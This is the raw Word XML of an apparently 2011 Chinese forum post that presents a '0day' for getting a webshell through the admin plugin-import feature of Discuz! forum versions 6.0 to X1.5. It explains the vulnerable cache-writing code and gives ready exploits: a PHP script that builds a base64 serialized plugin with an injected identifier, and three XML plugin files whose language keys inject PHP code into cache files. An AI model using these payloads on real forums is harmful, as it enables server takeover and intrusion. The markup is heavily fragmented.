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EF" w:rsidRPr="00153FEF" w:rsidRDefault="00153FEF" w:rsidP="00153FEF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153FEF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Discuz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00153FEF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>! 2011所有版本后台拿</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00153FEF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00153FEF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0day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153FEF" w:rsidRPr="00153FEF" w:rsidTr="0015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 xml:space="preserve">本帖最后由 小火 于 2011-3-19 14:07 编辑 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既然还没跪，我就从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!古老的6.0版本开始，漏洞都出现在扩展插件上，利用方式有所不同，下面开始。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b/>
                <w:bCs/>
                <w:sz w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">一 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00153FEF">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="36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b/>
                <w:bCs/>
                <w:sz w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">! 6.0 和 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00153FEF">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="36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b/>
                <w:bCs/>
                <w:sz w:val="36"/>
              </w:rPr>
              <w:t>! 7.0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既然要后台拿Shell，文件写入必看。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/include/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cache.func.php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1" name="图片 1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2914650"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="2" name="aimg_125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1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7" w:tgtFrame="_blank" w:tooltip="1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(70.28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往上翻,找到调用函数的地方.都在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updatecache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函数中.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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="190500" cy="190500"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="3" name="图片 3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2628900"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="4" name="aimg_1252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2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9" w:tgtFrame="_blank" w:tooltip="2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(81.75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如果我们可以控制$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['identifier']就有机会,它是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plugins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表里读出来的.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去后台看看,你可以发现identifier对应的是唯一标示符.联想下二次注射,单引号从数据库读出后写入文件时不会被转义.贱笑一下.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但是……你懂的,当你去野区单抓对面DPS时,发现对面蹲了4个敌人的心情.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/admin/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plugins.inc.php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5" name="图片 5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2428875"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="6" name="aimg_1253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3" descr="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11" w:tgtFrame="_blank" w:tooltip="3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(80.04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还好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!提供了导入的功能,好比你有隐身,对面没粉.你有疾风步,对面没控.好歹给咱留条活路.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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="190500" cy="190500"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="7" name="图片 7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4362450"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="8" name="aimg_1254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4" descr="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36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13" w:tgtFrame="_blank" w:tooltip="4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(128.65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随便新建一个插件,identifier为shell,生成文件路径及内容.然后导出备用.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/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forumdata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/cache/plugin_shell.php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9" name="图片 9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3905250" cy="3181350"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="10" name="aimg_1255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5" descr="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318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15" w:tgtFrame="_blank" w:tooltip="5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(34.23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我们可以输入任意数据,唯一要注意的是文件名的合法性.感谢微软,下面的文件名是合法的.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lastRenderedPageBreak/>
              <w:br/>
              <w:t>/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forumdata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/cache/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plugin_a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']=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phpinfo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();$a['a.php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11" name="图片 11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3867150" cy="3038475"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="12" name="aimg_1256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6" descr="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17" w:tgtFrame="_blank" w:tooltip="6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(39.77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最后是编码一次,给成Exp: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&lt;?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php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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$a = unserialize(base64_decode("YToyOntzOjY6InBsdWdpbiI7YTo5OntzOjk6ImF2YWlsYWJsZSI7czoxOiIw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IjtzOjc6ImFkbWluaWQiO3M6MToiMCI7czo0OiJuYW1lIjtzOjg6IkdldHNo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ZWxsIjtzOjEwOiJpZGVudGlmaWVyIjtzOjU6IlNoZWxsIjtzOjExOiJkZXNj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cmlwdGlvbiI7czowOiIiO3M6MTA6ImRhdGF0YWJsZXMiO3M6MDoiIjtzOjk6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ImRpcmVjdG9yeSI7czowOiIiO3M6OToiY29weXJpZ2h0IjtzOjA6IiI7czo3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OiJtb2R1bGVzIjtzOjA6IiI7fXM6NzoidmVyc2lvbiI7czo1OiI2LjAuMCI7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fQ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=="));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//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print_r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($a);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$a['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']['name']='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GetShell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';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$a['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']['identifier']='a\']=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phpinfo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();$a[\'';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print(base64_encode(serialize($a)));</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00153FEF" w:rsidRPr="00153FEF" w:rsidRDefault="00153FEF" w:rsidP="00153FEF">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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?&gt;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复制代码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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="190500" cy="190500"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="13" name="图片 13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857750" cy="3305175"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="14" name="aimg_1257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7" descr="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33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19" w:tgtFrame="_blank" w:tooltip="7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(42.35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 xml:space="preserve">7.0同理,大家可以自己去测试咯.如果你使用上面的代码,请勾选"允许导入不同版本 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! 的插件"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36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">二 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00153FEF">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36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36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">! 7.2 和 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00153FEF">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36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36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>! X1.5</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00153FEF" w:rsidRPr="00153FEF" w:rsidRDefault="00153FEF" w:rsidP="00153FEF">
            <w:pPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
              <w:outlineLvl w:val="3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本帖隐藏的内容需要回复才可以浏览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以下以7.2为例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/admin/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plugins.inc.php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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="190500" cy="190500"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="15" name="图片 15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3981450"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="16" name="aimg_1258" descr="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8" descr="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98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21" w:tgtFrame="_blank" w:tooltip="8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(99.62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先看导入数据的过程,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! 7.2之后的导入数据使用XML,但是7.2保持了向下兼容.X1.5废弃了.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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="190500" cy="190500"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="17" name="图片 17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4705350"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="18" name="aimg_1259" descr="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59" descr="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70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23" w:tgtFrame="_blank" w:tooltip="9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(100.29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判定了identifier之后,7.0版本之前的漏洞就不存在了.但是它又加入了语言包……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我们只要控制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scriptlangstr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或者其它任何一个就可以了。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19" name="图片 19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1438275"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="20" name="aimg_1260" descr="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60" descr="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25" w:tgtFrame="_blank" w:tooltip="10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(38.61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Key这里不通用.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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="190500" cy="190500"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="21" name="图片 21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1819275"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="22" name="aimg_1261" descr="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61" descr="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27" w:tgtFrame="_blank" w:tooltip="11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(36.71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7.2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23" name="图片 23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715000" cy="1562100"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="24" name="aimg_1262" descr="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62" descr="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29" w:tgtFrame="_blank" w:tooltip="12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(27.6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X1.5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还是看下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shell.lang.php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的文件格式.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25" name="图片 25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2476500" cy="1047750"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="26" name="aimg_1263" descr="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63" descr="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31" w:tgtFrame="_blank" w:tooltip="13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(6.69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7.2版本没有过滤Key,所以直接用\废掉单引号.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X1.5,单引号转义后变为\',再被替换一次',还是留下了\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而$v在两个版本中过滤相同,比较通用.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X1.5至少副站长才可以管理后台,虽然看不到插件选项,但是可以直接访问/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admin.php?frames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=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yes&amp;action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=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plugins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添加插件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 xml:space="preserve">$v通用Exp: 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&lt;?xml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 xml:space="preserve"> version="1.0" encoding="ISO-8859-1"?&gt;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&lt;root&gt;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id="Title"&gt;&lt;</w:t>
            </w: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![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>CDATA[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 xml:space="preserve">! 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id="Version"&gt;&lt;![CDATA[7.2]]&gt;&lt;/item&gt;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lastRenderedPageBreak/>
              <w:t>        &lt;item id="Time"&gt;&lt;![CDATA[2011-03-16 15:57]]&gt;&lt;/item&gt;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id="From"&gt;&lt;</w:t>
            </w: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![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>CDATA[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! Board (http://www.hacker58.info/Discuz_7.2_SC_UTF8/upload/)]]&gt;&lt;/item&gt;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id="Data"&gt;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id="available"&gt;&lt;![CDATA[0]]&gt;&lt;/item&gt;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adminid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"&gt;&lt;![CDATA[0]]&gt;&lt;/item&gt;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id="name"&gt;&lt;![CDATA[www]]&gt;&lt;/item&gt;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id="identifier"&gt;&lt;![CDATA[shell]]&gt;&lt;/item&gt;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id="description"&gt;&lt;![CDATA[]]&gt;&lt;/item&gt;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datatables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id="directory"&gt;&lt;![CDATA[]]&gt;&lt;/item&gt;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id="copyright"&gt;&lt;![CDATA[]]&gt;&lt;/item&gt;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id="modules"&gt;&lt;![CDATA[a:0:{}]]&gt;&lt;/item&gt;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id="version"&gt;&lt;![CDATA[]]&gt;&lt;/item&gt;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id="version"&gt;&lt;![CDATA[7.2]]&gt;&lt;/item&gt;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id="language"&gt;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scriptlang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        &lt;item id="a"&gt;&lt;![CDATA[b\]]&gt;&lt;/item&gt;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        &lt;item id=");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phpinfo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();?&gt;"&gt;&lt;![CDATA[x]]&gt;&lt;/item&gt;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&lt;/item&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00153FEF" w:rsidRPr="00153FEF" w:rsidRDefault="00153FEF" w:rsidP="00153FEF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&lt;/root&gt;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复制代码</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00153FEF" w:rsidRPr="00153FEF" w:rsidRDefault="00153FEF" w:rsidP="00153FEF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lastRenderedPageBreak/>
              <w:t>7.2 Key利用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&lt;?xml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 xml:space="preserve"> version="1.0" encoding="ISO-8859-1"?&gt;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&lt;root&gt;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id="Title"&gt;&lt;</w:t>
            </w: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![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>CDATA[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 xml:space="preserve">! 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id="Version"&gt;&lt;![CDATA[7.2]]&gt;&lt;/item&gt;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id="Time"&gt;&lt;![CDATA[2011-03-16 15:57]]&gt;&lt;/item&gt;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id="From"&gt;&lt;</w:t>
            </w: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![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>CDATA[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! Board (http://www.hacker58.info/Discuz_7.2_SC_UTF8/upload/)]]&gt;&lt;/item&gt;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id="Data"&gt;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id="available"&gt;&lt;![CDATA[0]]&gt;&lt;/item&gt;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adminid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"&gt;&lt;![CDATA[0]]&gt;&lt;/item&gt;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id="name"&gt;&lt;![CDATA[www]]&gt;&lt;/item&gt;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id="identifier"&gt;&lt;![CDATA[shell]]&gt;&lt;/item&gt;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id="description"&gt;&lt;![CDATA[]]&gt;&lt;/item&gt;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datatables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id="directory"&gt;&lt;![CDATA[]]&gt;&lt;/item&gt;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id="copyright"&gt;&lt;![CDATA[]]&gt;&lt;/item&gt;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id="modules"&gt;&lt;![CDATA[a:0:{}]]&gt;&lt;/item&gt;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id="version"&gt;&lt;![CDATA[]]&gt;&lt;/item&gt;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id="version"&gt;&lt;![CDATA[7.2]]&gt;&lt;/item&gt;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id="language"&gt;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scriptlang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        &lt;item id="a\"&gt;&lt;![CDATA[=&gt;1);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phpinfo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();?&gt;]]&gt;&lt;/item&gt;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&lt;/item&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00153FEF" w:rsidRPr="00153FEF" w:rsidRDefault="00153FEF" w:rsidP="00153FE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&lt;/root&gt;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lastRenderedPageBreak/>
              <w:t>复制代码</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00153FEF" w:rsidRPr="00153FEF" w:rsidRDefault="00153FEF" w:rsidP="00153FEF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X1.5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&lt;?xml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 xml:space="preserve"> version="1.0" encoding="ISO-8859-1"?&gt;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&lt;root&gt;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id="Title"&gt;&lt;</w:t>
            </w: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![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>CDATA[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 xml:space="preserve">! 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id="Version"&gt;&lt;![CDATA[7.2]]&gt;&lt;/item&gt;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id="Time"&gt;&lt;![CDATA[2011-03-16 15:57]]&gt;&lt;/item&gt;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id="From"&gt;&lt;</w:t>
            </w:r>
            <w:proofErr w:type="gram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![</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00153FEF">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>CDATA[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Discuz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! Board (http://www.hacker58.info/Discuz_7.2_SC_UTF8/upload/)]]&gt;&lt;/item&gt;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&lt;item id="Data"&gt;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plugin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id="available"&gt;&lt;![CDATA[0]]&gt;&lt;/item&gt;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adminid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"&gt;&lt;![CDATA[0]]&gt;&lt;/item&gt;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id="name"&gt;&lt;![CDATA[www]]&gt;&lt;/item&gt;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id="identifier"&gt;&lt;![CDATA[shell]]&gt;&lt;/item&gt;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id="description"&gt;&lt;![CDATA[]]&gt;&lt;/item&gt;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datatables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id="directory"&gt;&lt;![CDATA[]]&gt;&lt;/item&gt;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id="copyright"&gt;&lt;![CDATA[]]&gt;&lt;/item&gt;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id="modules"&gt;&lt;![CDATA[a:0:{}]]&gt;&lt;/item&gt;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id="version"&gt;&lt;![CDATA[]]&gt;&lt;/item&gt;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id="version"&gt;&lt;![CDATA[7.2]]&gt;&lt;/item&gt;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 &lt;item id="language"&gt;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&lt;item id="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scriptlang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"&gt;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        &lt;item id="a'"&gt;&lt;![CDATA[=&gt;1);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phpinfo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();?&gt;]]&gt;&lt;/item&gt;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                 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lastRenderedPageBreak/>
              <w:t>                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        &lt;/item&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00153FEF" w:rsidRPr="00153FEF" w:rsidRDefault="00153FEF" w:rsidP="00153FE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t>&lt;/root&gt;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复制代码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27" name="图片 27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838700" cy="2838450"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="28" name="aimg_1264" descr="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64" descr="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283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33" w:tgtFrame="_blank" w:tooltip="14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(28.67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29" name="图片 29" descr="http://www.linux520.com/bbs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linux520.com/bbs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714875" cy="2543175"/>
                  <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
                  <wp:docPr id="30" name="aimg_1265" descr="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265" descr="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35" w:tgtFrame="_blank" w:tooltip="15.jpg" w:history="1">
              <w:r w:rsidRPr="00153FEF">
                <w:rPr>
                  <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                  <w:b/>
                  <w:bCs/>
                  <w:vanish/>
                  <w:color w:val="0000FF"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>下载</w:t>
              </w:r>
            </w:hyperlink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 xml:space="preserve"> (41.81 KB)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vanish/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>4 天前 13:46</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00153FEF" w:rsidRPr="00153FEF" w:rsidRDefault="00153FEF" w:rsidP="00153FE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  <w:t>如果你愿意,可以使用base64_encode(serialize($a))的方法试试7.2获取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Webshell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153FEF">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:br/>
              <w:t xml:space="preserve">BY： </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00153FEF">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>jsbug</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00153FEF">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2011.03.17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740DD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2A80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4336C2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F0B8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A56044"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BCF2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CE6598"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6104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53FEF"/>
    <w:rsid w:val="00323B43"/>
    <w:rsid w:val="003D37D8"/>
    <w:rsid w:val="00426133"/>
    <w:rsid w:val="004358AB"/>
    <w:rsid w:val="006946F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53FE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53FEF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3F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153FEF"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体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153FEF"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a4">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00153FEF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153FE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3F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9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9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linux520.com/bbs/attachment.php?aid=MTI1NHw1ZTZmMjQ4OHwxMzAwODg4ODY0fDIxZTVnMGF4aVlaUFh2N0NiYkR6SnpYemhwVnNrQ29yaWttQ1BzTGlIRGNpL3hR&amp;nothumb=yes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linux520.com/bbs/attachment.php?aid=MTI1OHw3ZjVjNmNmY3wxMzAwODg4ODY0fDIxZTVnMGF4aVlaUFh2N0NiYkR6SnpYemhwVnNrQ29yaWttQ1BzTGlIRGNpL3hR&amp;nothumb=yes" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.linux520.com/bbs/attachment.php?aid=MTI1MXw3ZWEzNDBjYnwxMzAwODg4ODY0fDIxZTVnMGF4aVlaUFh2N0NiYkR6SnpYemhwVnNrQ29yaWttQ1BzTGlIRGNpL3hR&amp;nothumb=yes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linux520.com/bbs/attachment.php?aid=MTI1NnwwZjk4Y2ZkMnwxMzAwODg4ODY0fDIxZTVnMGF4aVlaUFh2N0NiYkR6SnpYemhwVnNrQ29yaWttQ1BzTGlIRGNpL3hR&amp;nothumb=yes" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.linux520.com/bbs/attachment.php?aid=MTI2MHxkNzEwNDU5Y3wxMzAwODg4ODY0fDIxZTVnMGF4aVlaUFh2N0NiYkR6SnpYemhwVnNrQ29yaWttQ1BzTGlIRGNpL3hR&amp;nothumb=yes" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.linux520.com/bbs/attachment.php?aid=MTI2NHw4OWEzZTZiOHwxMzAwODg4ODY0fDIxZTVnMGF4aVlaUFh2N0NiYkR6SnpYemhwVnNrQ29yaWttQ1BzTGlIRGNpL3hR&amp;nothumb=ye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://www.linux520.com/bbs/attachment.php?aid=MTI2Mnw0NDFjZDIxMnwxMzAwODg4ODY0fDIxZTVnMGF4aVlaUFh2N0NiYkR6SnpYemhwVnNrQ29yaWttQ1BzTGlIRGNpL3hR&amp;nothumb=y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linux520.com/bbs/attachment.php?aid=MTI1M3w4YzM0MDk2Y3wxMzAwODg4ODY0fDIxZTVnMGF4aVlaUFh2N0NiYkR6SnpYemhwVnNrQ29yaWttQ1BzTGlIRGNpL3hR&amp;nothumb=yes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://www.linux520.com/bbs/attachment.php?aid=MTI1NXw2M2Q2ZTBiOHwxMzAwODg4ODY0fDIxZTVnMGF4aVlaUFh2N0NiYkR6SnpYemhwVnNrQ29yaWttQ1BzTGlIRGNpL3hR&amp;nothumb=yes" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.linux520.com/bbs/attachment.php?aid=MTI1OXwwY2YyYzQxMXwxMzAwODg4ODY0fDIxZTVnMGF4aVlaUFh2N0NiYkR6SnpYemhwVnNrQ29yaWttQ1BzTGlIRGNpL3hR&amp;nothumb=yes" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.jpe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www.linux520.com/bbs/attachment.php?aid=MTI1N3wwN2ExYzljNHwxMzAwODg4ODY0fDIxZTVnMGF4aVlaUFh2N0NiYkR6SnpYemhwVnNrQ29yaWttQ1BzTGlIRGNpL3hR&amp;nothumb=yes" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.linux520.com/bbs/attachment.php?aid=MTI2M3xkYjBiOWIxYnwxMzAwODg4ODY0fDIxZTVnMGF4aVlaUFh2N0NiYkR6SnpYemhwVnNrQ29yaWttQ1BzTGlIRGNpL3hR&amp;nothumb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520.com/bbs/attachment.php?aid=MTI1MnxmYzY1ZmNlYnwxMzAwODg4ODY0fDIxZTVnMGF4aVlaUFh2N0NiYkR6SnpYemhwVnNrQ29yaWttQ1BzTGlIRGNpL3hR&amp;nothumb=yes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://www.linux520.com/bbs/attachment.php?aid=MTI2MXxjYWI1OWQyZXwxMzAwODg4ODY0fDIxZTVnMGF4aVlaUFh2N0NiYkR6SnpYemhwVnNrQ29yaWttQ1BzTGlIRGNpL3hR&amp;nothumb=yes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://www.linux520.com/bbs/attachment.php?aid=MTI2NXwzODc5NjI4MXwxMzAwODg4ODY0fDIxZTVnMGF4aVlaUFh2N0NiYkR6SnpYemhwVnNrQ29yaWttQ1BzTGlIRGNpL3hR&amp;nothumb=y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1398</Words>
  <Characters>7973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lenovo</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2008-09-11T17:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-03-23T14:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>